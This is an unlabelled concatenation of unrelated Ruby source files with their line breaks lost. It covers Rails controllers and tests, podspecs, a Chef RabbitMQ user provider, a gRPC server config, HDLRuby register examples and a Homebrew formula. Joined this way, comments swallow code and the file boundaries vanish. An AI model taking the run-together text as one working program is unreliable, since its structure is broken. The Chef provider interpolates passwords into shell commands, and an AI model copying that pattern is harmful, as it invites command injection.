elsif key == :description WorkPackageTextAreaField.new page, key elsif key == :status WorkPackageStatusField.new page else WorkPackageField.new page, key end end def add_child visit_tab!('relations') page.find('.wp-inline-create--add-link', text: I18n.t('js.relation_buttons.add_new_child')).click create_page(parent_work_package: work_package) end def visit_copy! page = create_page(original_work_package: work_package) page.visit! page end def trigger_edit_mode page.click_button(I18n.t('js.button_edit')) end def trigger_edit_comment add_comment_container.find('.inplace-editing--trigger-link').click end def update_comment(comment) add_comment_container.fill_in 'value', with: comment end def preview_comment label = I18n.t('js.inplace.btn_preview_enable') add_comment_container .find(:xpath, "//button[@title='#{label}']") .click end def save_comment label = 'Comment: Save' add_comment_container.find(:xpath, "//a[@title='#{label}']").click end def save! page.click_button(I18n.t('js.button_save')) end def add_comment_container find('.work-packages--activity--add-comment') end def click_add_wp_button find('.add-work-package:not([disabled])', text: 'Work package').click end def click_create_wp_button(type) find('.add-work-package:not([disabled])', text: 'Create').click find('#types-context-menu .menu-item', text: type, wait: 10).click end def select_type(type) find(@type_field_selector + ' option', text: type).select_option end def subject_field expect(page).to have_selector(@subject_field_selector + ' input', wait: 10) find(@subject_field_selector + ' input') end def description_field find('.wp-edit-field.description textarea') end private def create_page(_args) raise NotImplementedError end def ensure_no_conflicting_modifications expect_notification(message: 'Successful update') dismiss_notification! expect_no_notification(message: 'Successful update') end end end
# Use the staging config. require File.expand_path('staging.rb', __dir__)
# Backpack - Skyscanner's Design System # Copyright 2018-2021 Skyscanner Ltd # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Pod::Spec.new do |s| s.name = 'Backpack' s.version = "40.0.2" s.summary = "Skyscanner's Design System Backpack for iOS" s.description = <<-DESC The Skyscanner Design System, Backpack, for iOS apps DESC s.homepage = 'https://github.com/Skyscanner/backpack-ios' s.license = { type: 'Apache-2.0', file: 'LICENSE' } s.author = { 'Backpack Design System' => 'backpack@skyscanner.net' } s.source = { git: 'https://github.com/Skyscanner/backpack-ios.git', tag: s.version.to_s } s.ios.deployment_target = '12.0' s.source_files = 'Backpack/Backpack.h', 'Backpack/Common.h', 'Backpack/*/Classes/**/*.{h,m,swift}' s.public_header_files = 'Backpack/Backpack.h', 'Backpack/*/Classes/**/*.h' s.ios.resource_bundle = { 'Icon' => 'Backpack/Icon/Assets/*' } s.dependency 'FSCalendar', '~> 2.8.2' s.dependency 'TTTAttributedLabel', '~> 2.0.0' s.dependency 'FloatingPanel', '1.7.5' s.dependency 'MBProgressHUD', '~> 1.2.0' s.frameworks = 'UIKit', 'Foundation', 'CoreText' s.requires_arc = true s.swift_versions = ['5.0', '4.2', '4.0'] end
class ContainerDashboardController < ApplicationController extend ActiveSupport::Concern include Mixins::GenericSessionMixin include Mixins::BreadcrumbsMixin before_action :check_privileges before_action :get_session_data after_action :cleanup_action after_action :set_session_data def show @lastaction = "show_dashboard" if params[:id].nil? @breadcrumbs.clear end @title = title end def index redirect_to(:action => 'show') end def data return data_live if params[:live] == 'true' render :json => {:data => collect_data(params[:id])} end def heatmaps_data render :json => {:data => collect_heatmaps_data(params[:id])} end def ems_utilization_data render :json => {:data => collect_ems_utilization_data(params[:id])} end def network_metrics_data render :json => {:data => collect_network_metrics_data(params[:id])} end def pod_metrics_data render :json => {:data => collect_pod_metrics_data(params[:id])} end def image_metrics_data render :json => {:data => collect_image_metrics_data(params[:id])} end def data_live render :json => collect_live_data(params[:id], params[:query]) end def project_data render :json => {:data => collect_project_data(params[:id]) } end def title _("Container Dashboard") end def self.session_key_prefix "container_dashboard" end private def get_session_data super end def collect_data(provider_id) ContainerDashboardService.new(provider_id, self).all_data end def collect_heatmaps_data(provider_id) ContainerDashboardService.new(provider_id, self).all_heatmaps_data end def collect_ems_utilization_data(provider_id) ContainerDashboardService.new(provider_id, self).ems_utilization_data end def collect_network_metrics_data(provider_id) ContainerDashboardService.new(provider_id, self).network_metrics_data end def collect_pod_metrics_data(provider_id) ContainerDashboardService.new(provider_id, self).pod_metrics_data end def collect_image_metrics_data(provider_id) ContainerDashboardService.new(provider_id, self).image_metrics_data end def collect_live_data(provider_id, query) ems = ExtManagementSystem.find(provider_id) if ems && ems.connection_configurations.prometheus.try(:endpoint) PrometheusProxyService.new(provider_id, self).data(query) else HawkularProxyService.new(provider_id, self).data(query) end end def collect_project_data(project_id) ContainerProjectDashboardService.new(project_id, self).all_data end def breadcrumbs_options { :breadcrumbs => [ {:title => _("Compute")}, {:title => _("Containers")}, {:title => _("Overview"), :url => controller_url}, ], } end menu_section :cnt end
class Planet < ApplicationRecord has_many :moons end
module Fog module AWS class IAM class Real require 'fog/aws/parsers/iam/basic' # Remove a policy from a group # # ==== Parameters # * group_name<~String>: name of the group # * policy_name<~String>: name of policy document # # ==== Returns # * response<~Excon::Response>: # * body<~Hash>: # * 'RequestId'<~String> - Id of the request # # ==== See Also # http://docs.amazonwebservices.com/IAM/latest/APIReference/API_DeleteGroupPolicy.html # def delete_group_policy(group_name, policy_name) request( 'Action' => 'DeleteGroupPolicy', 'GroupName' => group_name, 'PolicyName' => policy_name, :parser => Fog::Parsers::AWS::IAM::Basic.new ) end end end end end
module Activerecord module Cti class Railtie < ::Rails::Railtie end end end
require_relative '../test_helper' require_relative 'test_commands/plain_subcommand' class CompletionTest < Minitest::Test def setup Fylla.load('test') end def test_cli_start_completion_generator expected = <<~'HERE' #compdef _test test function _test_help { _arguments \ "-h[Show help information]" \ "--help[Show help information]" \ "1: :_commands" \ "*::arg:->args"/. } function _test_generate_completions { _arguments \ "-h[Show help information]" \ "--help[Show help information]" \ "1: :_commands" \ "*::arg:->args"/. } function _test_sub_noopts { _arguments \ "-h[Show help information]" \ "--help[Show help information]" \ "1: :_commands" \ "*::arg:->args"/. } function _test_sub_withopts { _arguments \ "--an_option=[AN_OPTION]" \ "-h[Show help information]" \ "--help[Show help information]" \ "1: :_commands" \ "*::arg:->args"/. } function _test_sub_help { _arguments \ "-h[Show help information]" \ "--help[Show help information]" \ "1: :_commands" \ "*::arg:->args"/. } function _test_sub { local line function _commands { local -a commands commands=( 'help:Describe subcommands or one specific subcommand' 'noopts:subcommand that takes no options' 'withopts:subcommand that takes options' ) _describe 'command' commands } _arguments \ "-h[Show help information]" \ "--help[Show help information]" \ "1: :_commands" \ "*::arg:->args"/. case $line[1] in help) _test_sub_help ;; noopts) _test_sub_noopts ;; withopts) _test_sub_withopts ;; esac } function _test { local line function _commands { local -a commands commands=( 'generate_completions:generate completions' 'help:Describe available commands or one specific command' 'sub:a subcommand' ) _describe 'command' commands } _arguments \ "-h[Show help information]" \ "--help[Show help information]" \ "1: :_commands" \ "*::arg:->args"/. case $line[1] in generate_completions) _test_generate_completions ;; help) _test_help ;; sub) _test_sub ;; esac } HERE ARGV.clear ARGV << 'generate_completions' assert_output(expected) do Zsh::PlainSubcommands::Main.start(ARGV) end end end
module LambdaCallback class ResolutionProofResultController < AuthTokenController def create dcs = DocumentCaptureSession.new dcs.result_id = result_id_parameter dcs.store_proofing_result(resolution_result_parameter) end private def result_id_parameter params.require(:result_id) end def resolution_result_parameter params.require(:resolution_result) end def config_auth_token Figaro.env.resolution_proof_result_lambda_token end end end
# -*- encoding: utf-8 -*- # stub: sinatra 2.0.5 ruby lib Gem::Specification.new do |s| s.name = "sinatra".freeze s.version = "2.0.5" s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version= s.metadata = { "bug_tracker_uri" => "https://github.com/sinatra/sinatra/issues", "changelog_uri" => "https://github.com/sinatra/sinatra/blob/master/CHANGELOG.md", "documentation_uri" => "https://www.rubydoc.info/gems/sinatra", "homepage_uri" => "http://sinatrarb.com/", "mailing_list_uri" => "http://groups.google.com/group/sinatrarb", "source_code_uri" => "https://github.com/sinatra/sinatra" } if s.respond_to? :metadata= s.require_paths = ["lib".freeze] s.authors = ["Blake Mizerany".freeze, "Ryan Tomayko".freeze, "Simon Rozet".freeze, "Konstantin Haase".freeze] s.date = "2018-12-22" s.description = "Sinatra is a DSL for quickly creating web applications in Ruby with minimal effort.".freeze s.email = "sinatrarb@googlegroups.com".freeze s.extra_rdoc_files = ["README.de.md".freeze, "README.es.md".freeze, "README.fr.md".freeze, "README.hu.md".freeze, "README.ja.md".freeze, "README.ko.md".freeze, "README.malayalam.md".freeze, "README.md".freeze, "README.pt-br.md".freeze, "README.pt-pt.md".freeze, "README.ru.md".freeze, "README.zh.md".freeze, "LICENSE".freeze] s.files = ["LICENSE".freeze, "README.de.md".freeze, "README.es.md".freeze, "README.fr.md".freeze, "README.hu.md".freeze, "README.ja.md".freeze, "README.ko.md".freeze, "README.malayalam.md".freeze, "README.md".freeze, "README.pt-br.md".freeze, "README.pt-pt.md".freeze, "README.ru.md".freeze, "README.zh.md".freeze] s.homepage = "http://sinatrarb.com/".freeze s.licenses = ["MIT".freeze] s.rdoc_options = ["--line-numbers".freeze, "--inline-source".freeze, "--title".freeze, "Sinatra".freeze, "--main".freeze, "README.rdoc".freeze, "--encoding=UTF-8".freeze] s.required_ruby_version = Gem::Requirement.new(">= 2.2.0".freeze) s.rubygems_version = "3.1.4".freeze s.summary = "Classy web-development dressed in a DSL".freeze s.installed_by_version = "3.1.4" if s.respond_to? :installed_by_version if s.respond_to? :specification_version then s.specification_version = 4 end if s.respond_to? :add_runtime_dependency then s.add_runtime_dependency(%q<rack>.freeze, ["~> 2.0"]) s.add_runtime_dependency(%q<tilt>.freeze, ["~> 2.0"]) s.add_runtime_dependency(%q<rack-protection>.freeze, ["= 2.0.5"]) s.add_runtime_dependency(%q<mustermann>.freeze, ["~> 1.0"]) else s.add_dependency(%q<rack>.freeze, ["~> 2.0"]) s.add_dependency(%q<tilt>.freeze, ["~> 2.0"]) s.add_dependency(%q<rack-protection>.freeze, ["= 2.0.5"]) s.add_dependency(%q<mustermann>.freeze, ["~> 1.0"]) end end
require 'test_helper' class RegistrationsControllerTest < ActionController::TestCase setup do @request.env["devise.mapping"] = Devise.mappings[:user] I18n.available_locales = [:en, :fr, :et] I18n.locale = :en end test "a logged in user should be able to edit their user profile" do sign_in users(:user) get :edit, locale: :en assert_response :success end test "a logged in user should be able to update their user profile" do @user = users(:user) sign_in @user assert_difference 'User.find(2).name.length', -3 do patch :update, { id: @user.id, user: {name: 'something', current_password: '12345678'}, locale: :en } assert User.find(2).name == 'something', "name does not update" end assert_redirected_to root_path end test "an omniauth logged in user should be able to update their user profile without password" do @user = users(:oauth_user) sign_in @user assert_difference 'User.find(4).name.length', -3 do patch :update, { id: @user.id, user: {name: 'something'}, locale: :en } assert User.find(4).name == 'something', "name does not update" end assert_redirected_to root_path end test "a signed in user should NOT be able to change their admin or active status" do sign_in users(:user) patch :update, { id: 2, user: {admin: true, current_password: '12345678'}, locale: :en } assert users(:user).admin == false assert_redirected_to root_path end end
module Magento # http://www.magentocommerce.com/wiki/doc/webservices-api/api/sales_order_shipment # 100 Requested shipment not exists. # 101 Invalid filters given. Details in error message. # 102 Invalid data given. Details in error message. # 103 Requested order not exists. # 104 Requested tracking not exists. # 105 Tracking not deleted. Details in error message. class SalesOrderShipment < Base def api_path "order_shipment" end # sales_order_shipment.list # Retrieve list of shipments by filters # # Return: array # # Arguments: # # array filters - filters for shipments list def list(*args) results = commit("list", *args) Array(results).map do |result| self.class.new(connection, result) end end # sales_order_shipment.info # Retrieve shipment information # # Return: array # # Arguments: # # string shipmentIncrementId - order shipment increment id def info(*args) self.class.new(connection, commit("info", *args)) end # sales_order_shipment.create # Create new shipment for order # # Return: string - shipment increment id # # Arguments: # # string orderIncrementId - order increment id # array itemsQty - items qty to ship as associative array (order_item_id ⇒ qty) # string comment - shipment comment (optional) # boolean email - send e-mail flag (optional) # boolean includeComment - include comment in e-mail flag (optional) def create(*args) id = commit("create", *args) record = info(id) record end # sales_order_shipment.addComment # Add new comment to shipment # # Return: boolean # # Arguments: # # string shipmentIncrementId - shipment increment id # string comment - shipment comment # boolean email - send e-mail flag (optional) # boolean includeInEmail - include comment in e-mail flag (optional) def add_comment(*args) commit('addComment', *args) end # sales_order_shipment.addTrack # Add new tracking number # # Return: int # # Arguments: # # string shipmentIncrementId - shipment increment id # string carrier - carrier code # string title - tracking title # string trackNumber - tracking number def add_track(*args) commit('addTrack', *args) end # sales_order_shipment.removeTrack # Remove tracking number # # Return: boolean # # Arguments: # # string shipmentIncrementId - shipment increment id # int trackId - track id def remove_track(*args) commit('removeTrack', *args) end # sales_order_shipment.getCarriers # Retrieve list of allowed carriers for order # # Return: array # # Arguments: # # string orderIncrementId - order increment id def get_carriers(*args) commit('getCarriers', *args) end def find_by_id(id) info(id) end def find(find_type, options = {}) filters = {} options.each_pair { |k, v| filters[k] = {:eq => v} } results = list(filters) raise Magento::ApiError, "100 Requested shipment not exists." if results.blank? if find_type == :first info(results.first.increment_id) else Array(results).map do |s| info(s.increment_id) end end end end end
# Marks the given envelopes as deleted in a single transaction class BatchDeleteEnvelopes attr_reader :envelopes, :delete_token def initialize(envelopes, delete_token) @envelopes = envelopes @delete_token = delete_token end def run! Envelope.transaction do check_token! envelopes.map do |envelope| envelope.resource_public_key = delete_token.public_key envelope.mark_as_deleted! end end end private def check_token! return if delete_token.valid? raise MR::DeleteTokenError.new('Delete token has invalid attributes', delete_token.errors.full_messages) end end
# frozen_string_literal: true require 'rails_helper' RSpec.describe 'Discourse Zendesk Plugin' do let(:staff) { Fabricate(:moderator) } let(:zendesk_url_default) { 'https://your-url.zendesk.com/api/v2' } let(:zendesk_api_ticket_url) { zendesk_url_default + '/tickets' } let(:ticket_response) do { ticket: { id: 'ticket_id', url: 'ticket_url' } }.to_json end before do default_header = { 'Content-Type' => 'application/json; charset=UTF-8' } stub_request(:post, zendesk_api_ticket_url). to_return(status: 200, body: ticket_response, headers: default_header) stub_request(:get, zendesk_url_default + "/users/me"). to_return(status: 200, body: { user: {} }.to_json, headers: default_header) end describe 'Plugin Settings' do describe 'Storage Preparation' do let(:zendesk_enabled_default) { false } it 'has zendesk_url & zendesk_enabled site settings' do expect(SiteSetting.zendesk_url).to eq(zendesk_url_default) expect(SiteSetting.zendesk_enabled).to eq(zendesk_enabled_default) end end describe 'zendesk_job_push_only_author_posts?' do it 'disabled by default' do expect(SiteSetting.zendesk_job_push_only_author_posts?).to be_falsey end end end describe 'Zendesk Integration' do describe 'Create ticket' do let!(:topic) { Fabricate(:topic) } let!(:p1) { Fabricate(:post, topic: topic) } let(:zendesk_api_user_search_url) { zendesk_url_default + "/users/search?query=#{p1.user.email}" } let(:zendesk_api_user_create_url) { zendesk_url_default + "/users" } before do sign_in staff default_header = { 'Content-Type' => 'application/json; charset=UTF-8' } stub_request(:get, zendesk_api_user_search_url). to_return(status: 200, body: { user: {} }.to_json, headers: default_header) stub_request(:post, zendesk_api_user_create_url). to_return(status: 200, body: { user: { id: 24 } }.to_json, headers: default_header) end it 'creates a new zendesk ticket' do post '/zendesk-plugin/issues.json', params: { topic_id: topic.id } expect(WebMock).to have_requested(:post, zendesk_api_ticket_url).with { |req| body = JSON.parse(req.body) body['ticket']['submitter_id'] == 24 && body['ticket']['priority'] == 'normal' && body['ticket']['custom_fields'].find { |field| field['imported_from'].present? && field['external_id'].present? && field['imported_by'] == 'discourse_zendesk_plugin' } } expect(topic.custom_fields['discourse_zendesk_plugin_zendesk_api_url']).to eq('ticket_url') expect(topic.custom_fields['discourse_zendesk_plugin_zendesk_id']).to eq('ticket_id') end end end end
# frozen_string_literal: true require_relative '../report.rb' module Weather module Provider class Abstract def initialize(*_args) @city_name = 'Unknown' @city_id = nil end def current_weather_for(_city_name_or_id) raise NotImplementedError, "#{self.class.name}#current_weather_for() is an abstract method." end private attr_reader :city_name, :city_id def parse_city(city_name_or_id) if /\A\d+\z/.match(city_name_or_id.to_s) @city_id = city_name_or_id.to_i else @city_name = city_name_or_id.to_s end end def not_found_report report = report_with({}) report.not_found! report end def report_with(attributes = {}) base_atts = { city_name: city_name, city_id: city_id, temperature_in_celsius: nil, time_in_utc: Time.now.utc } Weather::Report.new(base_atts.merge(attributes)) end end end end
# # Cookbook Name:: rabbitmq # Provider:: user # # Copyright 2011, Opscode, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # action :add do execute "rabbitmqctl add_user #{new_resource.user} #{new_resource.password}" do not_if "rabbitmqctl list_users | grep #{new_resource.user}" Chef::Log.info "Adding RabbitMQ user '#{new_resource.user}'." new_resource.updated_by_last_action(true) end end action :delete do execute "rabbitmqctl delete_user #{new_resource.user}" do only_if "rabbitmqctl list_users | grep #{new_resource.user}" Chef::Log.info "Deleting RabbitMQ user '#{new_resource.user}'." new_resource.updated_by_last_action(true) end end action :set_permissions do if new_resource.vhost execute "rabbitmqctl set_permissions -p #{new_resource.vhost} #{new_resource.user} #{new_resource.permissions}" do not_if "rabbitmqctl list_user_permissions | grep #{new_resource.user}" Chef::Log.info "Setting RabbitMQ user permissions for '#{new_resource.user}' on vhost #{new_resource.vhost}." new_resource.updated_by_last_action(true) end else execute "rabbitmqctl set_permissions #{new_resource.user} #{new_resource.permissions}" do not_if "rabbitmqctl list_user_permissions | grep #{new_resource.user}" Chef::Log.info "Setting RabbitMQ user permissions for '#{new_resource.user}'." new_resource.updated_by_last_action(true) end end end action :clear_permissions do if new_resource.vhost execute "rabbitmqctl clear_permissions -p #{new_resource.vhost} #{new_resource.user}" do only_if "rabbitmqctl list_user_permissions | grep #{new_resource.user}" Chef::Log.info "Clearing RabbitMQ user permissions for '#{new_resource.user}' from vhost #{new_resource.vhost}." new_resource.updated_by_last_action(true) end else execute "rabbitmqctl clear_permissions #{new_resource.user}" do only_if "rabbitmqctl list_user_permissions | grep #{new_resource.user}" Chef::Log.info "Clearing RabbitMQ user permissions for '#{new_resource.user}'." new_resource.updated_by_last_action(true) end end end
module CourseOverviewHelper end
# Methods added to this helper will be available to all templates in the application. module ApplicationHelper include Acl9::Helpers # If user is an admin the admin options should be shown. access_control :show_admin_options? do allow :admin end # Return a progressbar def insert_progressbar(percent) tooltip = I18n.t('application.roadmap.progress_tooltip', :progress => percent) val = "<span id='roadmap_progressbar' class='ttLink' title='#{tooltip}'></span>" val += "<script type='text/javascript'>$('#roadmap_progressbar').progressbar({value: #{percent != 0 ? percent : 1}});</script>" val end end
# frozen_string_literal: true FactoryGirl.define do factory :course_discussion_topic_subscription, class: Course::Discussion::Topic::Subscription.name do association :topic, factory: :course_discussion_topic user end end
# # Be sure to run `pod lib lint ${POD_NAME}.podspec' to ensure this is a # valid spec before submitting. # # Any lines starting with a # are optional, but their use is encouraged # To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html # Pod::Spec.new do |s| def self.smart_version tag = `git describe --abbrev=0 --tags 2>/dev/null`.strip if $?.success? then tag else "0.0.1" end end s.name = '${POD_NAME}' s.version = smart_version s.summary = <<-DESC TODO: Add long description of the pod here. DESC # This description is used to generate tags and improve search results. # * Think: What does it do? Why did you write it? What is the focus? # * Try to keep it short, snappy and to the point. # * Write the description between the DESC delimiters below. # * Finally, don't worry about the indent, CocoaPods strips it! s.description = <<-DESC XiaoYing pod - ${POD_NAME} DESC s.homepage = 'git@github.com:Leon0206${POD_NAME}' # s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2' s.license = { :type => 'MIT', :file => 'LICENSE' } s.author = { 'leon0206' => '634376133@qq.com' } s.source = { :git => 'git@github.com:Leon0206/${POD_NAME}.git', :tag => s.version.to_s } # s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>' s.ios.deployment_target = '9.0' s.preserve_paths = "#{s.name}/Classes/**/*","Framework/**/*", "#{s.name}/Assets/**/*", $use_binary = nil $use_binary = ENV['use_binary'] $pod_use_binary = ENV["#{s.name}_use_binary"] if $pod_use_binary =='1' $use_binary = true elsif $pod_use_binary =='0' $use_binary = false else if $use_binary == '1' $use_binary = true end end tag = `git describe --abbrev=0 --tags 2>/dev/null`.strip if tag && !tag.empty? $use_binary =false end if $use_binary ==true s.vendored_frameworks = "Framework/**/*.framework" else s.source_files = "#{s.name}/Classes/**/*" end end
require "rails_helper" def robust_password "1G09_!9s08vUsa" end def fill_valid_user fill_in :user_address, with: generate(:french_address) fill_in :user_phone_number, with: generate(:french_phone_number) fill_in :user_email, with: "hello+#{(rand * 10000).to_i}@covidliste.com" # needs valid email here check :user_statement check :user_toc end def signup_submit click_on "S’inscrire" end RSpec.describe "Users", type: :system do let(:user) { build(:user) } before do allow_any_instance_of(GeocodingService).to receive(:call).and_return({ lat: 48.12345, lon: 2.12345 }) end context "sign up" do it "can sign up" do expect do visit "/" fill_valid_user signup_submit end.to change { User.count }.by(1) end it "rejects sign up if address has no zipcode valid" do user.save! expect do visit "/" fill_valid_user fill_in :user_address, with: "5 rue Larue, Marseille" # no zipcode signup_submit end.not_to change { User.count } expect(page).to have_text("doit comporter un code postal") end it "rejects sign up if email is not unique" do user.save! expect do visit "/" fill_valid_user fill_in :user_email, with: user.email # not unique signup_submit end.not_to change { User.count } expect(page).to have_text("correspond déjà à une personne inscrit") end it "rejects sign up if statement is not checked" do expect do visit "/" fill_valid_user uncheck :user_statement signup_submit end.not_to change { User.count } end it "rejects sign up if toc is not checked" do expect do visit "/" fill_valid_user uncheck :user_toc signup_submit end.not_to change { User.count } end it "stores statement and toc acceptance timestamps" do expect do visit "/" fill_valid_user signup_submit end.to change { User.count }.by(1) user = User.last expect(user.statement_accepted_at).not_to be_nil expect(user.toc_accepted_at).not_to be_nil end it "redirects a partner to their vaccination center page" do partner = create(:partner) visit new_partner_session_path fill_in :partner_email, with: partner.email fill_in :partner_password, with: partner.password click_on "Connexion" visit "/" expect(page).to have_text("Bonjour #{partner.name}") end end context "after login" do before do user.save! token = Devise::Passwordless::LoginToken.encode(user) visit users_magic_link_url({user: {email: user.email, token: token}}) expect(page).to have_text("Connecté(e).") expect(page).to have_text("Vous êtes inscrit sur Covidliste depuis") end it "it allows me to edit personal information " do new_attributes = { phone_number: generate(:french_phone_number) } new_attributes.each do |key, new_value| fill_in "user_#{key}", with: new_value end click_on "Je modifie mes informations" expect(page).to have_text("Modifications enregistrées.") user.reload new_attributes.each do |key, value| if key == :phone_number expect(user.phone_number).to end_with(new_attributes[:phone_number][1..].delete(" ")) else expect(user.public_send(key)).to eq value end end end it "it allows me to delete my account" do expect do accept_confirm_modal do click_on "Supprimer mon compte" end end.to change { User.active.count }.by(-1) expect(page).to have_text("Votre compte a bien été supprimé.") end it "it allows me to decline the delete" do expect do decline_confirm_modal do click_on "Supprimer mon compte" end end.to change { User.active.count }.by(0) end context "with a confirmed match" do let(:campaign) { build(:campaign) } let!(:match) { create(:match, campaign: campaign, confirmed_at: Time.now, user: user) } it "it does not allow me to edit personal information" do click_on "Je modifie mes informations" expect(page).not_to have_text("Modifications enregistrées.") expect(page).to have_text("Vous ne pouvez pas modifier vos informations actuellement car vous avez confirmé un rendez-vous de vaccination.") end it "it does not allow te delete my account" do expect do accept_confirm_modal do click_on "Supprimer mon compte" end end.to change { User.active.count }.by(0) expect(page).to_not have_text("Votre compte a bien été supprimé.") expect(page).to have_text("Vous ne pouvez pas supprimer votre compte actuellement car vous avez confirmé un rendez-vous de vaccination.") end end context "with a pending match" do let(:campaign) { build(:campaign) } let!(:match) { create(:match, campaign: campaign, confirmed_at: nil, expires_at: 10.minutes.since, user: user) } it "it does not allow me to edit personal information " do click_on "Je modifie mes informations" expect(page).not_to have_text("Modifications enregistrées.") expect(page).to have_text("Vous ne pouvez pas modifier vos informations actuellement car vous avez une proposition rendez vous de vaccination en cours.") end it "it allows me to delete my account" do expect do accept_confirm_modal do click_on "Supprimer mon compte" end end.to change { User.active.count }.by(-1) expect(page).to have_text("Votre compte a bien été supprimé.") end end end describe "Login using password less link" do before { user.save! } context "expired link" do scenario "it notifies the user" do token = Devise::Passwordless::LoginToken.encode(user) magic_link = users_magic_link_url({user: {email: user.email, token: token}}) travel Devise.passwordless_login_within + 2.minutes visit magic_link expect(page).to_not have_current_path(profile_path) expect(page).to have_text(I18n.t("devise.failure.user.magic_link_invalid")) end end context "invalid link (remove last character)" do scenario "it notifies the user" do token = Devise::Passwordless::LoginToken.encode(user)[0...-1] magic_link = users_magic_link_url({user: {email: user.email, token: token}}) visit magic_link expect(page).to_not have_current_path(profile_path) expect(page).to have_text(I18n.t("devise.failure.user.magic_link_invalid")) end end end end
#!/usr/bin/env ruby $: << File.expand_path('../lib', __dir__) require 'etc' require 'logger' require 'griffin' require 'grpc' require 'griffin/interceptors/server/logging_interceptor' require_relative '../grpc/benchmark_queue_service' require_relative '../grpc/benchmark_report_service' Griffin::Server.configure do |c| c.bind '' c.services [ BenchmarkQueueService, BenchmarkReportService, ] c.interceptors [ Griffin::Interceptors::Server::LoggingInterceptor.new, ] # Number of processes c.workers 1 # Min/Max number of threads per process to handle gRPC call (= maximum concurrent number of gRPC requests per process) c.pool_size 15,15 # Min/Max number of threads per process to handle HTTP/2 connection (= maximum concurrent connection per process) c.connection_size 2,2 c.logger Logger.new($stdout) end Griffin::Server.run(port: ENV.fetch('PORT', '50051')&.to_i)
require 'HDLRuby' configure_high # Describes a simple D-FF system :dff0 do bit.input :clk, :rst, :d bit.output :q, :qb qb <= ~q par(clk.posedge) do q <= d & ~rst end end # Instantiate it for checking. dff0 :dff0I # Decribes another D-FF system :dff1 do input :clk, :rst, :d output :q, :qb qb <= ~q (q <= d & ~rst).at(clk.posedge) end # Instantiate it for checking. dff1 :dff1I # Describes an 8-bit register system :reg8 do input :clk, :rst [7..0].input :d [7..0].output :q, :qb qb <= ~q (q <= d & [~rst]*8).at(clk.posedge) end # Instantiate it for checking. reg8 :reg8I # Describes a n-bit register. system :regn do |n| input :clk, :rst [n-1..0].input :d [n-1..0].output :q,:qb qb <= ~q (q <= d & [~rst]*n).at(clk.posedge) end # Instantiate it for checking. # regn :regn8I,8 regn(8).(:regn8I) # Describes a register of generic type. # NOTE: the input can be automatically connected from the generic argument. system :reg do |typ| input :clk, :rst typ.input :d # Now ensure typ is a type. typ = typ.type if typ.is_a?(HExpression) typ.output :q,:qb qb <= ~q (q <= d & [~rst]*typ.width).at(clk.posedge) end # Instantiate it for checking. # reg :regbit8I, bit[7..0] reg(bit[7..0]).(:regbit8I) # Instantiate it with infered type from connection. bit[8].inner :sig0 reg(sig0).(:regSig0I) # Function generating the body of a register description. def make_reg_body(typ) input :clk, :rst typ.input :d typ.output :q,:qb qb <= ~q (q <= d & [~rst]*typ.width).at(clk.posedge) end # Now declare the systems decribing the registers. system :dff_body do make_reg_body(bit) end system :reg8_body do make_reg_body(bit[7..0]) end system :regn_body do |n| make_reg_body(bit[n-1..0]) end system :reg_body do |typ| make_reg_body(typ) end # Instantiate these systems for checking them. dff_body :dff_bodyI reg8_body :reg8_bodyI # regn_body :regn_bodyI, 8 regn_body(8).(:regn_bodyI) # reg_body :reg_bodyI, bit[7..0] reg_body(bit[7..0]).(:reg_bodyI) # Function generating a register declaration. def make_reg(name,&blk) system name do |*arg| input :clk, :rst blk.(*arg).input :d blk.(*arg).output :q,:qb qb <= ~q (q <= d & [~rst]*blk.(*arg).width).at(clk.posedge) end end # Now let's generate the register declarations. make_reg(:dff_make) { bit } make_reg(:reg8_make){ bit[7..0] } make_reg(:regn_make){ |n| bit[(n-1)..0] } make_reg(:reg_make) { |typ| typ } # Instantiate these systems for checking them. dff_make :dff_makeI reg8_make :reg8_makeI regn_make :regn_makeI, 8 reg_make :reg_makeI, bit[7..0] # Generate the low level representation. low = reg_makeI.systemT.to_low # Displays it puts low.to_yaml
module Indie module Otp class ApplicationController < ApplicationController::Base protect_from_forgery with: :exception end end end
class Phyml < Formula # cite Guindon_2010: "https://doi.org/10.1093/sysbio/syq010" desc "Fast maximum likelihood-based phylogenetic inference" homepage "http://www.atgc-montpellier.fr/phyml/" url "https://github.com/stephaneguindon/phyml/archive/v3.3.20200621.tar.gz" sha256 "a8243923ee08c74cab609a4b086ade66c6156fc2b24450e2a500108dc644c867" license "GPL-3.0" bottle do root_url "https://ghcr.io/v2/brewsci/bio" sha256 cellar: :any_skip_relocation, catalina: "adac7f68bc36a7bd0b4954749d2293af62ea6d9fe91febed13d84f514f089ed9" sha256 cellar: :any_skip_relocation, x86_64_linux: "7253c8ac68f4f24790adc53d49c9030fd0113fe8f33c482375c47874386ce43e" end depends_on "autoconf" => :build depends_on "automake" => :build depends_on "libtool" => :build depends_on "pkg-config" => :build def install system "./autogen.sh" system "./configure", "--prefix=#{prefix}" system "make" bin.install "src/phyml" doc.install "doc/phyml-manual.pdf" pkgshare.install Dir["examples/*"] end test do assert_match version.to_s, shell_output("#{bin}/phyml --version", 1) end end
require "railspress/version" require "railspress/engine" module Railspress # Your code goes here... end
include YARD::MRuby::Templates::Helpers::HTMLHelper def init sections :header, [:function_signature, T('docstring'), :source] end def source return if owner != object.namespace return if Tags::OverloadTag === object return if object.source.nil? erb(:source) end
